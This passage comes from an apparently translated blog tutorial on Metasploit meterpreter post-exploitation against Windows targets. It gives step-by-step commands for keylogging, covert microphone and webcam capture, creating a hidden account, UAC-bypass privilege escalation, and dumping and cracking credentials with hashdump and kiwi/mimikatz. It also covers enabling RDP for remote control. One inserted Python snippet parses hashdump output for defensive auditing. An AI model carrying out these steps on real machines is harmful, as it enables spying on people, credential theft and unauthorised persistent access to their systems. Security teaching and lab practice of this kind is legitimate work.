7 dir List the target directory
8 mkdir Create a directory on the target
9 rmdir Delete a directory on the target
10 edit Edit a file
11 getlwd Print the local working directory
12 getwd Print the target working directory
13 lcd Change the local directory
14 lls List the local directory
15 ls List the target directory
16 lpwd Print the local working directory
17 pwd Print the target working directory
19 search Search for files (see search -h for details)

Understanding Linux permissions

chmod 777 {filename.suffix} gives the owner, the group and everyone else read, write and execute permission on the file

chmod 777 shell.elf

15 Uploading and downloading files after exploitation

ID Command Description
1 upload Upload a file to the target
2 download Download a file from the target

16 Screenshots after exploitation

ID Command Description
1 screenshot Screenshot (Windows)

17 Keylogging after exploitation

ID Command Description
1 keyscan_start Start the keylogger (Windows)
2 keyscan_dump Dump the captured keystrokes (Windows)
3 keyscan_stop Stop the keylogger (Windows)

18 Creating an account after exploitation (Windows)

1. Environmental preparation

1 MSF-Metasploit Framework

2 A target machine on which a meterpreter session has been obtained

2. Practice

1. First check which users are currently logged on to the target; in meterpreter enter: run post/windows/gather/enum_logged_on_users

2. Use getgui to create an account with the username msb and the password 123456

run getgui -u msb -p 123456

run getgui -u {username} -p {password}

Press Win+R and run netplwiz to check whether the account was created

[-] Insufficient privileges, account was not be created. If you see this message, you need to escalate privileges first (to SYSTEM)

2.1 UAC bypass privilege escalation

use exploit/windows/local/ask

19 Post-exploitation: recording audio from the microphone

1. Environment preparation
MSF-Metasploit Framework
A mobile phone or emulator
2. Practice

record_mic has 4 optional parameters:

-d is to set the recording duration

-f set the output file path

-h view help

-p play the recording automatically after capture

A simple recording command

record_mic -d 10 -p true

20 Post-exploitation privilege escalation

1. Environmental preparation

1 MSF-Metasploit Framework

2 A Windows target machine

2. Practice

1. Privilege escalation (Windows). Check the permissions of the user obtained so far; enter in meterpreter: getuid

Method 1: enter getsystem in meterpreter

Method 2: use an msf module to escalate privileges

To escalate, you must already have a meterpreter session; send it to the background by entering background in meterpreter

1. To view the available modules, enter search bypassuac in the MSF console to list the privilege escalation modules

2. Select a privilege escalation module suitable for the current system; a Windows 10 system is used here.

Then try use exploit/windows/local/bypassuac_windows_store_reg to escalate privileges

If this module doesn't work, switch to use exploit/windows/local/bypassuac_sluihijack

Or use exploit/windows/local/bypassuac_dotnet_profiler

3 Configure the module parameters; enter in the console: show options

4 You can see that a session needs to be set. Enter: set session {id of the session to escalate}

5 Run the module; enter: run

6 After the new meterpreter session opens, enter getuid; if it shows the privileges have not been escalated yet, enter getsystem to obtain them

7 Enter getuid again; it now shows SYSTEM, the highest privilege

This proves the privilege escalation succeeded

21 Obtaining login passwords after exploitation (Windows)

1. Environmental preparation

1 MSF-Metasploit Framework

2 A Windows target machine

2. Practice

First obtain a meterpreter session with SYSTEM privileges

1 Grab the automatic logon account password

2 Dump the local account password hashes from the SAM database

3 Dump password hashes with hashdump

4 Use the kiwi module


1 Many people enable automatic logon on their computer; the account password used for automatic logon can be retrieved with

run windows/gather/credentials/windows_autologin

If the module prints an error prompt, the machine is not configured for automatic logon

2 You can also dump the local user accounts from the SAM database (note that SYSTEM privileges are required)

run post/windows/gather/smart_hashdump

Output format: username:RID:LM hash:NTLM hash:::
mb:1000:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::

3 Use hashdump to get the password hashes (note that SYSTEM privileges are required)

Enter run hashdump in the terminal

Look the hash up with the online tool https://www.cmd5.com/

NTLM hash example: 32ed87bdb5fdc5e9cba88547376818d4
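As an added example (not part of the original post), a Python parser for the pwdump-style lines that smart_hashdump and hashdump print, written from the reviewer's side: it splits username:RID:LM:NTLM::: records and flags the two well-known hashes of an empty password (the LM value aad3b435b51404eeaad3b435b51404ee, which means LM hashes are not being stored, and the NTLM value 31d6cfe0d16ae931b73c59d7e0c089c0, which means the account has a blank password). The sample dump is constructed; it reuses the page's line for user mb plus two made-up accounts.

```python
from dataclasses import dataclass
from typing import Dict, List

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"    # LM hash of an empty password (LM storage disabled)
EMPTY_NTLM = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NTLM hash of an empty password

@dataclass
class DumpedAccount:
    username: str
    rid: int
    lm_hash: str
    ntlm_hash: str

    @property
    def lm_stored(self) -> bool:
        """True when a real LM hash is stored (legacy format that is trivially cracked)."""
        return self.lm_hash != EMPTY_LM

    @property
    def blank_password(self) -> bool:
        return self.ntlm_hash == EMPTY_NTLM

def parse_hashdump(text: str) -> List[DumpedAccount]:
    """Parse username:RID:LM:NTLM::: lines, skipping status lines such as '[+] ...'."""
    accounts = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue  # not a hash record (blank line, module status message, ...)
        accounts.append(DumpedAccount(parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()))
    return accounts

def audit_hashdump(text: str) -> Dict[str, List[str]]:
    """Summarise what a defender should act on: blank passwords and stored LM hashes."""
    accounts = parse_hashdump(text)
    return {
        "accounts": [a.username for a in accounts],
        "blank_password": [a.username for a in accounts if a.blank_password],
        "lm_stored": [a.username for a in accounts if a.lm_stored],
    }

# Constructed dump: the page's sample line for user mb plus two made-up accounts
# (the LM hash of 'legacy' is a placeholder, not a real hash).
SAMPLE_DUMP = """\
[+] Dumping password hashes...
mb:1000:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
legacy:1001:0123456789abcdef0123456789abcdef:32ed87bdb5fdc5e9cba88547376818d4:::
"""
```

Running audit_hashdump(SAMPLE_DUMP) reports Guest as a blank-password account and legacy as an account whose LM hash is still stored.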

4 Use load kiwi (SYSTEM privileges are required for the kiwi module)

The kiwi_cmd command exposes all of mimikatz's functions; mimikatz commands can be passed directly to kiwi_cmd

4.1 Enter load kiwi in the terminal

4.2 creds_all retrieves passwords directly

4.3 Use kiwi_cmd sekurlsa::logonpasswords to retrieve passwords

ID kiwi command Description
1 creds_all: List all credentials
2 creds_kerberos: List all Kerberos credentials
3 creds_msv: List all msv credentials
4 creds_ssp: List all ssp credentials
5 creds_tspkg: List all tspkg credentials
6 creds_wdigest: List all wdigest credentials
7 dcsync: Retrieve user account information via DCSync
8 dcsync_ntlm: Retrieve a user account's NTLM hash, SID and RID via DCSync
9 golden_ticket_create: Create a golden ticket
10 kerberos_ticket_list: List Kerberos tickets
11 kerberos_ticket_purge: Purge Kerberos tickets
12 kerberos_ticket_use: Use a Kerberos ticket
13 kiwi_cmd: Run a mimikatz command; follow it with the mimikatz.exe command
14 lsa_dump_sam: Dump the SAM from LSA
15 lsa_dump_secrets: Dump LSA secrets
16 password_change: Change a password
17 wifi_list: List the current user's Wi-Fi profiles
18 wifi_list_shared: List shared Wi-Fi profiles/codes

22 Post-exploitation remote monitoring (Windows)

1. Environment preparation

1 rdesktop

Install rdesktop online

On Debian, Ubuntu and Kali use the following command

apt-get install rdesktop

On CentOS/RedHat use yum

yum -y install rdesktop

2 A Windows target machine (a virtual machine can be used if no physical computer is available)

3 MSF-Metasploit Framework

2. Practice

1 Remote control with rdesktop

Note: rdesktop is a Linux client for Windows Remote Desktop connections; it lets you access a Windows desktop remotely from Linux and supports many Windows versions. rdesktop is a GPL-licensed open-source project hosted on SourceForge; it uses RDP (Remote Desktop Protocol) and can connect to almost every version of Windows

Common rdesktop parameters

ID Parameter Description
1 -u Username
2 -p Password
3 -a 16 Use 16-bit colour for the remote display
4 -f Full-screen mode (exit full screen with Ctrl+Alt+Enter)
5 -g Set the resolution, e.g. -g 1024x768
6 rdesktop -h Show rdesktop help

rdesktop -u username -p password -f IP

rdesktop -u mb -p 123456 -f -g 1024x720 192.168.110.24

If Remote Desktop is not enabled on the remote computer, enter in meterpreter

Enable Remote Desktop Protocol: run post/windows/manage/enable_rdp

2 Remote access via VNC

23 Post-exploitation: using the camera

1. Environmental preparation

1 MSF-Metasploit Framework

2 A Windows target machine

3 An Android device (not an emulator)

2. Practice

Once a meterpreter session has been obtained on the target, the webcam module can be used to drive software and hardware cameras

Commands supported by the webcam module

ID Command Description
1 webcam_list List all software and hardware cameras on the target and number them
2 webcam_snap Take a picture with a single camera; the first camera is used by default
3 webcam_stream Stream video from a single camera; the first camera is used by default

1 webcam_list

2 webcam_snap takes a picture with a single camera

ID Parameter Description
1 -h Show help
2 -i Camera number to use, e.g. -i 1
3 -p Storage path, e.g. -p /root
4 -q Picture quality, e.g. -q 100; default 50
5 -v true/false: open the picture automatically after it is taken; default true

3 webcam_stream streams video from a single camera

ID Parameter Description
1 -h Show help
2 -d Stream duration in seconds, e.g. -d 100; default 1800
3 -i Camera number to use, e.g. -i 1
4 -q Stream quality, e.g. -q 100; default 50
5 -s Path of the stream file, e.g. -s live; default is the current directory (note that the directory is not created automatically if it does not exist)
7 -f Path of the playback file, e.g. -f live; default is the current directory
8 -v true/false: open the stream automatically after it starts; default true


Origin blog.csdn.net/m0_52051132/article/details/127410049